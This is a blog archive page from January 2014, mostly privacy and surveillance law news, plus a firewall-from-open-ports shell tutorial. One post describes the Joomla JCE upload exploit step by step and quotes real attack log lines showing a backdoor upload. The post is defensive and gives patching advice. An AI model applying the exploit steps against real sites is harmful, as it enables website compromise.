Monthly Archives: January 2014

Increased Focus on Cyber Insurance Post-Target Breach

Recent media attention focused on the security breach that affected millions of Target customers has increased interest in cyber insurance to cover the financial losses associated with these types of events. As insurers aggressively market insurance products to protect against cyber risks, it’s important to note differences in the language carriers have chosen to include in their policy forms. Contrary to reasonable expectations and marketing brochures, policy clauses concerning timing, and conditions requiring due diligence, might be used by an aggressive insurer to undermine the transfer of risk. In an article published in Law360, a Hunton & Williams Insurance Litigation & Counseling partner examines whether the Target breach would be covered by one carrier’s form.

NSA Appoints Chief Privacy Officer

On January 29, 2014, the National Security Agency (“NSA”) announced that Rebecca Richards has been appointed to serve as the NSA’s new Civil Liberties and Privacy Officer. Ms. Richards, who previously worked as the Senior Director for Privacy Compliance at the Department of Homeland Security, will advise the NSA Director on civil liberties and privacy issues and implement reforms in those areas.

Ms. Richards’ appointment follows the publication of a December 2013 report, Liberty and Security in a Changing World, that recommended “the creation of a privacy and civil liberties policy official located both in the National Security Staff and the Office of Management and Budget.” It also comes less than two weeks after President Obama delivered a major speech calling for reforms to government surveillance programs, including those conducted by the NSA.

In announcing the appointment, General Keith Alexander, the Director of the NSA, praised Ms. Richards’ privacy expertise. Director Alexander noted that “privacy and civil liberties considerations remain a vital driver for [the NSA’s] strategic decisions” and that having a Civil Liberties and Privacy Officer will help the agency “bring new perspectives to how [it] can best consider civil liberties and privacy” while protecting national security.

Federal German Court Rules on Credit Scoring and Data Subject Access Rights

On January 28, 2014, the Federal Court of Justice of Germany clarified the scope of a data subject’s right of access to personal data in the context of credit scoring. Germany’s Federal Data Protection Act contains detailed and expansive provisions on the right of access where personal data are processed and shared to determine a data subject’s future behavior.

The court had to decide whether this required a credit reference agency to disclose (1) how its scoring algorithm weighed various factors and (2) how the reference groups used to arrive at a credit score were comprised. The full text of the judgment is not yet available but, according to the press release, the court held that while credit reference agencies must disclose all personal data referred to in the Federal German Data Protection Act, they do not have to disclose the two items mentioned above.

The court noted that the legislative intent behind the provision was to make credit scoring more transparent to consumers, while also protecting the credit reference agencies’ trade secrets (e.g., the scoring algorithms). Because transparency includes providing information that would enable a data subject to take action to change his or her score, data subjects must be informed about the specific matters the credit reference agencies take into account when calculating credit scores. That said, a data subject does not need to know the agency’s formula for weighing various factors or how the reference groups are comprised. Accordingly, data subjects cannot require credit reference agencies to disclose those types of details.

The judgment provides an important clarification by Germany’s highest civil court in an area heavily regulated by German data protection law. It is relevant to all businesses that process and share personal data subject to German law using predictive algorithms.

Commissioner Reding Calls for New European Data Protection Compact

On January 28, 2014, Data Protection Day, Vice-President of the European Commission and Commissioner for Justice Fundamental Rights and Citizenship Viviane Reding gave a speech in Brussels proposing a new data protection compact for Europe. She focused on three key themes: (1) the need to rebuild trust in data processing, (2) the current state of data protection in the EU, and (3) a new data protection compact for Europe.

The Need to Rebuild Trust

Following the recent National Security Agency (“NSA”) surveillance revelations, Commissioner Reding stated that the most important goal for 2014 is to restore the trust of citizens in how their data are safeguarded. To achieve this goal, she recommended that:

  • Safe Harbor be strengthened by enforcing the 13 recommendations proposed by the European Commission in October 2013; and
  • The EU and U.S. agree and finalize the “umbrella” agreement on the transfer and processing of personal information in the context of police and judicial cooperation in criminal matters, which is currently being negotiated, and would afford EU citizens the same rights as U.S. citizens when their data are exchanged with the United States.

Commissioner Reding also referred to the new rights of data subjects that would be introduced by the proposed EU General Data Protection Regulation (the “Proposed Regulation”), which include the right to be forgotten, the right to data portability, and the right to be informed of personal data breaches. Commissioner Reding called for more meaningful enforcement, citing as example recent fines levied against Google Inc. in the amounts of €900,000 (in Spain) and €150,000 (in France), which she described as “more like pocket money than a fine” to Google.

The State of Data Protection Reforms in the EU

Commissioner Reding emphasized the European Parliament’s “overwhelming” support for the Proposed Regulation in its compromise text adopted in October 2013. However, she criticized many European leaders and major companies for failing to uphold data protection as a fundamental goal, stating that “some companies and a few governments continue to see data protection as an obstacle rather than as a solution; privacy rights as compliance costs, and not as an asset.” She noted that, two years after the legislative proposals were first released, “Discussions are mature. The text is ready. It is just a matter of political will.”

A Data Protection Compact for Europe

Commissioner Reding concluded her speech by proposing eight principles that should govern the way personal data are processed in the public and the private sector:

  • Europe should finalize the Proposed Regulation in 2014, as “[o]therwise others will move first and impose their standards on [Europe].”
  • The Proposed Regulation should not distinguish between the private and the public sector, and should apply the same principles and standards to both.
  • Laws affecting individuals’ privacy must be publicly consulted.
  • In relation to surveillance activities, data collection must be targeted, limited and in proportion to the surveillance objectives.
  • Laws need to be clear and kept up-to-date, otherwise they risk being applied “in ways that had not been imagined at the time [they were] written,” due to technological advancements.
  • National security exemptions should be invoked sparingly, since “not everything that relates to foreign relations is a matter of national security.”
  • Judicial authorities have an important role to play in deciding where the balance lies between protecting individuals’ privacy and maintaining nations’ security.
  • Data protection rules should apply irrespective of the nationality and place of residence of the data subject.

Commissioner Reding emphasized that bolstering trust in the way companies and governments process personal data would benefit the digital economy, national security, the Internet and Europe as a whole.

Episode #174: Lightning Lockdown

Hal firewalls fast

Recently a client needed me to quickly set up an IP Tables firewall on a production server that was effectively open on the Internet. I knew very little about the machine, and we couldn't afford to break any of the production traffic to and from the box.

It occurred to me that a decent first approximation would be to simply look at the network services currently in use, and create a firewall based on that. The resulting policy would probably be a bit more loose than it needed to or should be, but it would be infinitely better than no firewall at all!

I went with lsof, because I found the output easier to parse than netstat:

# lsof -i -nlP | awk '{print $1, $8, $9}' | sort -u
COMMAND NODE NAME
httpd TCP *:80
named TCP 127.0.0.1:53
named TCP 127.0.0.1:953
named TCP [::1]:953
named TCP 150.123.32.3:53
named UDP 127.0.0.1:53
named UDP 150.123.32.3:53
ntpd UDP [::1]:123
ntpd UDP *:123
ntpd UDP 127.0.0.1:123
ntpd UDP 150.123.32.3:123
ntpd UDP [fe80::baac:6fff:fe8e:a0f1]:123
ntpd UDP [fe80::baac:6fff:fe8e:a0f2]:123
portreser UDP *:783
sendmail TCP 150.123.32.3:25
sendmail TCP 150.123.32.3:25->58.50.15.213:1526
sendmail TCP *:587
sshd TCP *:22
sshd TCP 150.123.32.3:22->121.28.56.2:39054

I could have left off the process name, but it helped me decide which ports were important to include in the new firewall rules. Honestly, the output above was good enough for me to quickly throw together some workable IP Tables rules. I simply saved the output to a text file and hacked things together with a text editor.

But maybe you only care about the port information:

# lsof -i -nlP | awk '{print $9, $8, $1}' | sed 's/.*://' | sort -u
123 UDP ntpd
1526 TCP sendmail
22 TCP sshd
25 TCP sendmail
39054 TCP sshd
53 TCP named
53 UDP named
587 TCP sendmail
783 UDP portreser
80 TCP httpd
953 TCP named
NAME NODE COMMAND

Note that I inverted the field output order, just to make my sed a little easier to write

If you wanted to go really crazy, you could even create and load the actual rules on the fly. I don't recommend this at all, but it will make Tim's life harder in the next section, so here goes:

lsof -i -nlP | tail -n +2 | awk '{print $9, $8}' | 
sed 's/.*://' | sort -u | tr A-Z a-z |
while read port proto; do ufw allow $port/$proto; done

I added a "tail -n +2" to get rid of the header line. I also dropped the command name from my awk output. There's a new "tr A-Z a-z" in there to lower-case the protocol name. Finally we end with a loop that takes the port and protocol and uses the ufw command line interface to add the rules. You could do the same with the iptables command and its nasty syntax, but if you're on a Linux distro with UFW, I strongly urge you to use it!

So, Tim, I figure you can parse netstat output pretty easily. How about the command-line interface to the Windows firewall? Remember, adversity builds character...

Tim builds character

When I first saw this I thought, "Man, this is going to be easy with the new cmdlets in PowerShell v4!" There are a lot of new cmdlets available in PowerShell version 4, and both Windows 8.1 and Server 2012R2 ship with PowerShell version 4. In addition, PowerShell version 4 is available for Windows 7 SP1 (and later) and Windows Server 2008 R2 SP1 (and later).

The first cmdlet that will help us out here is Get-NetTCPConnection. According to the help page this cmdlet "gets current TCP connections. Use this cmdlet to view TCP connection properties such as local or remote IP address, local or remote port, and connection state." This is going to be great! But...

It doesn't mention the process ID or process name. Nooooo! This can't be. Let's look at all the properties of the output objects.

PS C:\> Get-NetTCPConnection | Format-List *

State : Established
AppliedSetting : Internet
Caption :
Description :
ElementName :
InstanceID : 192.168.1.167++445++10.11.22.33++49278
CommunicationStatus :
DetailedStatus :
HealthState :
InstallDate :
Name :
OperatingStatus :
OperationalStatus :
PrimaryStatus :
Status :
StatusDescriptions :
AvailableRequestedStates :
EnabledDefault : 2
EnabledState :
OtherEnabledState :
RequestedState : 5
TimeOfLastStateChange :
TransitioningToState : 12
AggregationBehavior :
Directionality :
LocalAddress : 192.168.1.167
LocalPort : 445
RemoteAddress : 10.11.22.33
RemotePort : 49278
PSComputerName :
CimClass : ROOT/StandardCimv2:MSFT_NetTCPConnection
CimInstanceProperties : {Caption, Description, ElementName, InstanceID...}
CimSystemProperties : Microsoft.Management.Infrastructure.CimSystemProperties

Dang! This will get most of what we want (where "want" was defined by that Hal guy), but it won't get the process ID or the process name. So much for rubbing the new cmdlets in his face.

Let's forget about Hal for a second and get what we can with this cmdlet.

PS C:\> Get-NetTCPConnection | Select-Object LocalPort | Sort-Object -Unique LocalPort
LocalPort
---------
135
139
445
3587
5357
49152
49153
49154
49155
49156
49157
49164

This is helpful for getting a list of ports, but not useful for making decisions about what should be allowed. Also, we would need to run Get-NetUDPEndpoint to get the UDP connections. This is so close, yet so bloody far. We have to resort to the old school netstat command and the -b option to get the executable name. In episode 123 we needed parsed netstat output. I recommended the Get-Netstat script available at poshcode.org. Sadly, we are going to have to resort to that again. With this script we can quickly get the port, protocol, and process name.

PS C:\> .\get-netstat.ps1 | Select-Object ProcessName, Protocol, LocalPort | 
Sort-Object -Unique LocalPort, Protocol, ProcessName


ProcessName Protocol Localport
----------- -------- ---------
svchost TCP 135
System UDP 137
System UDP 138
System TCP 139
svchost UDP 1900
svchost UDP 3540
svchost UDP 3544
svchost TCP 3587
dasHost UDP 3702
svchost UDP 3702
System TCP 445
svchost UDP 4500
...

It should be pretty obvious that the port 137-149 and 445 should not be accessible from the internet. We can filter these ports out so that we don't allow these ports through the firewall.

PS C:\> ... | Where-Object { (135..139 + 445) -NotContains $_.LocalPort }
ProcessName Protocol Localport
----------- -------- ---------
svchost UDP 1900
svchost UDP 3540
svchost UDP 3544
svchost TCP 3587
dasHost UDP 3702
svchost UDP 3702
svchost UDP 4500
...

Now that we have the ports and protocols we can create new firewall rules using the new New-NetFirewallRule cmdlet. Yeah!

PS C:\> .\get-netstat.ps1 | Select-Object Protocol, LocalPort | Sort-Object -Unique * | 
Where-Object { (135..139 + 445) -NotContains $_.LocalPort } |
ForEach-Object { New-NetFirewallRule -DisplayName AllowedByScript -Direction Outbound
-Action Allow -LocalPort $_.LocalPort -Protocol $_.Protocol }

Name : {d15ca484-5d16-413f-8460-a29204ff06ed}
DisplayName : AllowedByScript
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Outbound
Action : Allow
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local
...

These new firewall cmdlets really make things easier, but if you don't have PowerShellv4 you can still use the old netsh command to add the firewall rules. Also, the Get-Netstat will support older version of PowerShell as well, so this is nicely backwards compatible. All we need to do is replace the command inside the ForEach-Object cmdlet's script block.

PS C:\> ... | ForEach-Object { netsh advfirewall firewall add rule 
name="AllowedByScript" dir=in action=allow protocol=$_.Protocol
localport=$_.LocalPort }

Invasion of JCE Bots

Joomla has been one of the most popular CMS for a long time.  It powers a huge number of sites.  That’s great! The flip side of this fact is Joomla has been very popular for a long time and there are still very many sites that use older versions of Joomla as well as older version of Joomla components. For example, the 1.5.x branch of Joomla (2008-2010) still has a noticeable share in live Joomla sites.

Old versions may work well for your site but they have multiple well known security holes, so they are the low hanging fruit for hackers. Let me show this using a real world example.

JCE attack

There is a JCE component — a fancy content editor that can be found almost on every Joomla site. It has a well known security hole that allows anyone to upload arbitrary files to a server.

You can easily find a working exploit code for this vulnerability.  What it does is:

  1. Checks whether a vulnerable version of JCE is installed (2.0.11, 2.0.12, 2.0.13, 2.0.14, 2.0.15, 1.5.7.10, 1.5.7.11, 1.5.7.12, 1.5.7.13, 1.5.7.14)
  2. Exploits the bug in the JCE image manager to upload a PHP file with a .gif extenstion to the images/stories directory
  3. Then uses a JSON command to rename the .gif file to *.php.

Now you have a backdoor on a server and can do whatever you want with the site.

This is how this attack looks in logs (real example):

197.205.70.37 - - [23/Jan/2014:16:46:54 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.0" 200 302 "-" "BOT/0.1 (BOT for JCE)"
197.205.70.37 - - [23/Jan/2014:16:46:55 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.0" 200 329 "-" "BOT/0.1 (BOT for JCE)"
197.205.70.37 - - [23/Jan/2014:16:46:55 -0500] "GET /images/stories/3xp.php HTTP/1.0" 200 465 "-" "BOT/0.1 (BOT for JCE)"

As I mentioned, JCE is a very popular component and there are still many sites that use old versions of this component. No wonder, hackers are scanning the Internet for such vulnerable sites.  They reworked the exploit code for use in their automated tools that relentlessly test millions of sites, one by another.  These days, I can find multiple requests with the “BOT/0.1 (BOT for JCE)” User-Agent string in logs of almost every site that I check, even in logs of sites that have never had Joomla installed.

I’d like to share some interesting statistics of a real site that had been hacked using this JCE hole and then was being routinely reinfected every day.

  • 7,409 requests with the User-Agent “BOT/0.1 (BOT for JCE)” that came from 785 different IPs during the period of Dec 24th – Jan 24th (one month)
  • 239 requests from 51 unique IP addresses during the last 24 hours
  • 4 independent (uploaded different types of backdoors) successful infections during one day.
  • plus, multiple tests for other vulnerabilities.

To webmasters

As you can see,  this is something that you can’t neglect or consider an insignificant threat.  It’s silly to hope that hackers won’t find your site. Today hackers have resources to spider the Internet almost as efficiently as Google just about 10 years ago, so there is almost no chance your site will stay unnoticed. The only way to prevent the hacks is to be proactive:  keep all software up-to-date and harden your sites.

In case of this particular JCE attack:

  1. Make sure to upgrade your Joomla site to the most current version.
  2. Upgrade JCE to the latest version. You can find download packages for all the three branches of Joomla here.
  3. Protect all file upload directories and all directories that shouldn’t contain .php files. For example, place the following .htaccess file there to prevent execution of PHP files:
    <Files *.php>
    deny from all
    </Files>
  4. Try blocking requests with the “BOT/0.1 (BOT for JCE)” User-Agent string.  Of course, this shouldn’t be considered as a real protection. Hackers can change the User-Agent string to whatever they want. But it can help keep some dumb annoying bots away from your site.
  5. If, for some reason, you can’t upgrade your site at this moment, consider placing it behind a website firewall that will block any malicious traffic before it reaches your server.  This is something that we call virtual patching in Sucuri CloudProxy.

PCLOB Report Concludes NSA’s Bulk Collection of Customer Phone Records Is Unlawful

On January 23, 2014, the Privacy and Civil Liberties Oversight Board (“PCLOB”) released a report (the “Report”) concluding that the National Security Agency (“NSA”) does not have a valid legal basis for its bulk telephone records collection program. The NSA’s bulk collection of consumer telephone records has been under increased scrutiny since Edward Snowden leaked information about the program in June 2013, and recently has faced legal challenges. According to the Report, the NSA’s program exceeded its statutory parameters.

The PCLOB is an independent agency within the executive branch, composed of a chairman and four part-time members. Its duties include reviewing the counterterrorism activities of the executive branch to ensure that the privacy and civil liberties of individuals is protected.

The NSA’s bulk collection of consumer phone records ostensibly is conducted pursuant to Section 215 of the USA PATRIOT Act. According to the Report, however, the NSA’s collection of consumer telephone records far exceeds the framework devised by Section 215. The Report states that Section 215 is designed to allow the FBI to acquire business records when those business records are relevant to an FBI investigation. According to the Report, however, the telephone records collected by the NSA “have no connection to any specific FBI investigation.” The Report further states that because the records are collected in bulk, “they cannot be regarded as ‘relevant’ to any FBI investigation as required by [Section 215] without redefining the word relevant in a manner that is circular, unlimited in scope, and out of step with the case law from analogous legal contexts.”

In addition, the PCLOB concluded that the NSA’s bulk collection of consumer telephone records violates the Electronic Communications Privacy Act (“ECPA”). ECPA prohibits telephone companies from disclosing customer records to the government, except in specified scenarios. The Report stated that none of the ECPA scenarios permitting disclosure apply to the NSA’s bulk collection of customer records.

Read the PCLOB’s Report.

New Independent Commission on Internet Governance Launched

On January 22, 2014, at the World Economic Forum in Davos-Klosters, Switzerland, Sweden’s Minister for Foreign Affairs Carl Bildt announced the creation of a new independent commission that will examine the future of Internet governance. The Global Commission on Internet Governance (the “Commission”) is being launched by think tanks Chatham House and The Centre for International Governance Innovation (“CIGI”). The Commission will be chaired by Bildt, Sweden’s former Prime Minister, and supported by expert members representing business, government, academia and civil society. In announcing the initiative, Bildt stated that “[n]et freedom is as fundamental as freedom of information and freedom of speech in our societies.”

The two-year initiative will focus on:

  • governance legitimacy, including regulatory approaches and standards;
  • innovation, including infrastructure and competition;
  • the rights of individuals online, human rights, privacy and freedom of expression; and
  • systemic risks, including establishing cyber crime cooperation.

The Commission aims to “educate the wider public on the most effective ways to promote Internet access, while simultaneously championing the principles of freedom of expression and the free flow of ideas over the Internet.” It will host public stakeholder consultations and conduct research studies, the findings of which will be published on an ongoing basis. At the end of the two-year period, the Commission will produce a final report on Internet governance and multistakeholder governance.

Further information can be found on the Commission’s website.

Hunton Global Privacy Update – January 2014

On January 21, 2014, Hunton & Williams’ Global Privacy and Cybersecurity practice group hosted the latest webcast in its Hunton Global Privacy Update series. The program highlighted some of the key privacy developments that companies will encounter in 2014, including cybersecurity issues in the U.S., California’s Do Not Track legislation, Safe Harbor, the EU General Data Protection Regulation and the CNIL’s new cookie guidance.

Listen to a recording of the January 2014 Hunton Global Privacy Update. Previous recordings of the Hunton Global Privacy Updates may be accessed under the Multimedia Resources section of our privacy blog.

Hunton Global Privacy Update sessions are 30 minutes in length and are scheduled to take place every two months. The next Update is slated for March 18, 2014.

The Class Action Hurricane: Where Is the Storm Heading?

It appears as though 2014 will be a banner year for class actions, including numerous cases concerning privacy and cybersecurity issues. In an article published in Law360, two Hunton & Williams litigation partners summarize recent case law and statistics related to class actions and offer predictions for the year ahead.

Download a copy of the full article.

FTC Announces Settlement with Twelve Companies Falsely Claiming Compliance with the Safe Harbor Framework

On January 21, 2014, the Federal Trade Commission announced settlements with twelve companies that allegedly falsely claimed that they complied with the U.S.-EU Safe Harbor Framework. The settlements stem from allegations that the companies violated Section 5 of the FTC Act by falsely representing that they held current Safe Harbor certifications despite having allowed their certifications to expire. The companies involved represent a variety of industries, ranging from technology and accounting to consumer products and National Football League teams.

The U.S.-EU Safe Harbor Framework is a cross-border data transfer mechanism that enables certified organizations to move personal data from the European Union to the United States in compliance with European data protection laws. To join the Safe Harbor Framework, a company must self-certify to the Department of Commerce that it complies with seven privacy principles (notice, choice, onward transfer, security, data integrity, access and enforcement) and related requirements that have been deemed to meet the EU’s adequacy standard.

In its complaints, the FTC alleged that the companies represented, through statements in their privacy policies or by displaying the Safe Harbor certification mark, that they were “current” participants in the Safe Harbor Framework, even after failing to renew their Safe Harbor certifications on an annual basis. Accordingly, the FTC found such representations “false and misleading.” According to the complaints, “a company under the FTC’s jurisdiction that claims it has self-certified to the Safe Harbor principles, but in fact failed to self-certify to Commerce, may be subject to an enforcement action based on the FTC’s deception authority under Section 5 of the FTC Act.” Although the Commission alleged that the companies’ conduct violated Section 5 of the FTC Act, the FTC noted that this does not necessarily mean the companies committed any substantive violations of the Safe Harbor Framework’s privacy principles.

The proposed settlement agreements prohibit the relevant companies from misrepresenting, expressly or by implication, the extent to which they participate in any privacy or security program sponsored by the government or any other self-regulatory or standard-setting organization, including the U.S.-EU Safe Harbor Framework and the U.S.-Swiss Safe Harbor Framework.

In the press release accompanying the settlement, FTC Chairwoman Edith Ramirez stated that “Enforcement of the U.S.-EU Safe Harbor Framework is a Commission priority. These twelve cases help ensure the integrity of the Safe Harbor Framework and send the signal to companies that they cannot falsely claim participation in the program.”

Read the FTC Business Center Blog’s post about the Safe Harbor settlements and our previous posts on the Department of Commerce’s Key Points document on the Safe Harbor Frameworks and the future of the U.S.-EU Safe Harbor Framework.

Update: On June 25, 2014, the FTC approved the final settlement orders with the twelve companies.

Department of Commerce Highlights the Benefits, Oversight and Enforcement of the Safe Harbor Frameworks

In January 2014, the Department of Commerce’s International Trade Administration (“ITA”) posted a Key Points document to provide additional information about the benefits, oversight and enforcement of the U.S.-European Union and U.S.-Swiss Safe Harbor Frameworks. The Key Points document supplements information about the Safe Harbor Frameworks already available on the Department of Commerce website. For example, in the Key Points, the ITA notes that: 

  • The Safe Harbor Frameworks provide significant economic benefits not only to the U.S. economy, but also to the EU and Swiss economies. The ITA notes that “[m]any U.S. organizations that self-certify to Safe Harbor do so at the express request of European customers/clients or partners, while others are actually U.S. subsidiaries or divisions of European organizations.”
  • Anyone can check the Safe Harbor lists on the Department of Commerce’s website to verify whether an organization has certified to one or both of the Safe Harbor Frameworks, and if the organization’s certification is current. The ITA notes that if an organization fails to complete the annual re-certification process in time, the organization’s certification status is changed from “Current” to “Not Current.” The ITA also emphasizes that agreeing to adhere to the Safe Harbor Frameworks is a permanent undertaking in the sense that an organization must continue to apply the Safe Harbor Privacy Principles to personal data obtained through the Safe Harbor Frameworks for as long as the organization stores, uses or discloses the data – even if the organization “subsequently leaves the Safe Harbor for any reason.”
  • The ITA plays an important role in overseeing the Safe Harbor Frameworks even if they function as self-certification programs. The ITA indicates that it reviews “every” Safe Harbor initial self-certification and annual re-certification submission, and that it contacts organizations to inform them if their submissions are incomplete and explain what steps must be taken to finalize the process. The ITA notes that “during the first nine months of 2013, the ITA notified approximately 56% of the organizations from which it had received first-time self-certification submissions and 27% of the organizations from which it had received recertification submissions to inform the organizations of shortcomings identified during the review.”
  • The Safe Harbor Frameworks require that there be “readily available and affordable” dispute resolution.
  • At the time the Key Points document was issued, the Federal Trade Commission had brought ten Safe-Harbor-related enforcement actions, all of which resulted in consent decrees. The ITA emphasizes that, although the FTC is committed to prioritizing referrals from EU and Swiss data protection authorities and private sector third party dispute resolution providers, the FTC “can and has pursued cases on its own initiative.”

See our January 21, 2014 blog post on the most recent round of Safe Harbor enforcement actions brought by the FTC (subsequent to the ITA’s release of the Key Points document).

FTC Announces 3.5 Million Dollar Settlement for Alleged FCRA Violations

On January 16, 2014, the Federal Trade Commission announced a settlement with TeleCheck Services, Inc., and its affiliated debt-collection entity, TRS Recovery Services, Inc. (collectively, “TeleCheck”). The settlement stems from allegations that TeleCheck violated various provisions of the Fair Credit Reporting Act (“FCRA”). According to the press release, the settlement is “part of a broader initiative to target the practices of data brokers, which often compile, maintain, and sell sensitive consumer information” and is similar to an FTC settlement with a different company in August 2013.

In its complaint, the FTC alleged that TeleCheck, a company that provides check verification services for merchants, did not follow reasonable procedures to ensure the maximum possible accuracy of report information it maintained about consumers. According to the complaint, TeleCheck did not sufficiently track the resolution of consumer disputes, which increased the risk that inaccurate information was retained in consumer’s files. Among other violations, the complaint alleged that TeleCheck (1) impermissibly shifted the burden to consumers to investigate disputed information, (2) impermissibly restricted investigations into disputed information, (3) failed to complete the investigations it did undertake within the time periods specified in the FCRA, and (4) failed to maintain reasonable procedures to avert the reappearance of information that was deleted pursuant to an investigation from a consumer’s file.

The settlement, filed in the United States District Court for the District of Columbia, includes requirements that TeleCheck:

  • pay $3.5 million to the FTC as a civil penalty;
  • refrain from violating relevant provisions of the FCRA;
  • submit a compliance report to the FTC within 180 days;
  • notify the FTC of any changes in its structure that may affect its compliance with the settlement for 10 years;
  • create certain records (e.g., accounting and personnel records as well as consumer complaints and training materials) for 10 years, and retain each record created for five years; and
  • submit compliance reports to the FTC upon request.

In the press release accompanying the settlement, Jessica Rich, the Director of the FTC’s Bureau of Consumer Protection, stated that “[i]f [consumer reporting agencies] like TeleCheck provide merchants with inaccurate information, those merchants may wrongly deny consumers the ability to buy even the most essential items, like food and medicine.”

Read the FTC Business Center Blog’s post about the TeleCheck settlement. Read our previous coverage on 2013 FCRA class action settlements.

Interview with Peter Van Eeckhoutte, Special Guest Joel Yonts – Episode 358, Part 1 – January 16, 2014

Peter Van Eeckhoutte is the founder of Corelan Team, author of exploit writing tutorial series and free tools. He started working in IT and security in 1995, and currently works as a CISO.

Joel Yonts is a seasoned security executive with a passion for information security research. He has over 20 years of diverse Information Technology experience with an emphasis in Information Security. Joel is currently the Chief Information Security Officer for Advanced Auto Parts and maintains a blog at Malicious Streams.com.

President Obama Calls for Major Changes in National Security Surveillance Programs

In a major speech delivered at the U.S. Department of Justice on January 17, 2014, President Obama addressed the call for reforms to government surveillance programs following disclosures regarding National Security Agency (“NSA”) activities leaked by Edward Snowden since June of last year. The President discussed the need to advance national security while strengthening protections for privacy and civil liberties, improving transparency in intelligence programs, engaging in continual oversight and rebuilding trust among foreign leaders and citizens. He outlined several areas of reform:

  • A new Presidential Directive on domestic and overseas signals intelligence activity is intended to strengthen executive branch oversight and ensure that such activities take into account security, trade and investment relationships with foreign countries, as well as privacy and civil liberties. Under this Directive, the Administration would strengthen privacy protections for foreign leaders and citizens in connection with signals intelligence activities overseas.
  • Greater transparency in surveillance activity and improved safeguards for the privacy of U.S. persons. This includes the declassification of Foreign Intelligence Surveillance Court (“FISC”) opinions that have broad privacy implications, and a call to Congress to authorize the establishment of a panel of advocates from outside the government to argue significant cases before the FISC.
  • Reforms to activities conducted under Section 702 (i.e., the PRISM Program) that would place additional restrictions on the government’s ability to retain, search and use in criminal cases the communications of Americans that were collected incidentally pursuant to this law.
  • Amendments to the way in which the Department of Justice uses National Security Letters so that communications service providers may disclose to their customers that they were the subject of a National Security Letter after a fixed period of time, unless the government demonstrates a need for secrecy.
  • Changes that would allow communications service providers to make public more information about electronic surveillance orders that they have received from the government.
  • Significant reforms to the bulk collection of telephone metadata records under Section 215 of the USA PATRIOT Act. This program creates a database of phone numbers and the times and length of calls that can be queried when the government has a reasonable suspicion that a particular number is linked to a terrorist organization. The reforms would preserve the current program’s capabilities, but the government would not hold the bulk metadata. The President did not specify which institutions or industry would hold the data, and called on the Attorney General and the Director of National Intelligence to develop options for this new approach.
  • The designation of a senior state department officer to coordinate diplomacy on issues relating to technology and signals intelligence.
  • A comprehensive review of big data and privacy led by the White House.

The President’s speech portends a major shift in the role of industry in data collection activities relating to national security. If these reforms go through, industry will enjoy greater flexibility to share information about National Security Letters with affected customers, and to disclose information about electronic surveillance orders with the public. That said, industry also will take on a significant burden with respect to the retention of telephone and other records, which may be expensive and could have privacy and cybersecurity implications.

Ukraine Adopts New Data Protection Regulations

As reported by Bloomberg BNA, on January 13, 2014, Ukrainian Parliament Commissioner for Human Rights Valeriya Lutkovska (the “Ombudsman”) announced the adoption of new data protection regulations. The Ombudsman became the new data protection authority in Ukraine as of January 1, 2014, when amendments to abolish the previous data protection authority became effective. As we previously reported, Ukraine first passed personal data protection legislation in June 2010.

The new data protection regulations require data controllers to (1) notify data subjects of the processing of their personal data within 30 working days, and (2) notify the Ombudsman of the processing of “high risk data” that constitute a special risk to the rights and freedoms of data subjects. The Ombudsman may issue warnings to data controllers for failure to notify the Ombudsman of the processing of “high risk data.” In addition, the new data protection regulations provide for monitoring and audit compliance procedures pursuant to which the Ombudsman may conduct announced and unannounced audits.

FTC Settles with Apple for Kids’ In-App Purchases

On January 15, 2014, the Federal Trade Commission announced a proposed settlement with Apple Inc. stemming from allegations that the company billed consumers for mobile app charges incurred by children without their parents’ consent. Specifically, the FTC’s complaint alleges that Apple violated the FTC Act by not informing account holders that, for a 15-minute window after entering their password to approve a single in-app purchase, their children could make unlimited purchases without further action by the parent.

Apple agreed to pay a minimum of $32.5 million to provide refunds to consumers. To the extent not all of the $32.5 million is refunded to eligible account holders, the balance will be deposited into a fund to be administered by the FTC. According to the Order, the fund can then be used for equitable relief at the FTC’s discretion. The company will be required to change its billing practices no later than March 31, 2014 to ensure that it has obtained express, informed consent from consumers prior to billing them for in-app charges. Apple also must give consumers the option to withdraw their consent for future charges at any time.

The FTC vote to accept the consent agreement package was 3-1, with Commissioner Joshua Wright issuing a dissenting statement. Chairwoman Edith Ramirez and Commissioner Julie Brill issued a joint statement, and Commissioner Maureen Ohlhausen issued a separate statement.

This settlement follows an increased focus by the FTC on mobile technology issues: in March 2013, the FTC released a report on key consumer and privacy issues resulting from the increasingly widespread use of mobile payments; in February 2013, the FTC issued recommendations for transparency in mobile privacy disclosures; and in December 2012, the FTC expressed concern regarding privacy disclosures on mobile applications for kids.

The settlement with Apple is open for public comment until February 14, 2014.

Update: On March 27, 2014, the FTC approved the final settlement order with Apple.

UK High Court Rules in Cookies Claim Against Google

On January 16, 2014 the High Court in London rejected submissions made on behalf of Google Inc. (“Google”) that the case brought against it by three UK-based users of Apple’s Safari browser should be heard in the U.S., rather than before an English court. The decision means that the case could be heard before a court in England, although media reports suggest Google will appeal the decision.

The claims against Google arise from the placing of cookies on Apple devices used by the three individuals, resulting in the generation of targeted advertising.

Google is a U.S. corporation registered in Delaware and its principal place of business is in California. The general rule regarding court jurisdiction is that, when the potential defendant is based in the U.S., civil cases must be brought before the U.S. courts, even where those bringing the case are based in another jurisdiction. However, in a limited set of circumstances, English courts are prepared to accept jurisdiction over a case and allow the claimants to serve court papers on a potential defendant outside the jurisdiction. Service of the papers is the first step in having the case heard before an English court.

In order to be allowed to serve the papers outside the UK, the claimants had to convince the High Court that:

  • the claims being made against Google could be classified as torts under English law, and that either damage was sustained by the claimants in the UK or damage resulted from an act committed within the UK;
  • there is a serious issue to be tried on the merits of the claim; and
  • taking all the circumstances into account, the appropriate forum to resolve the dispute would be an English court.

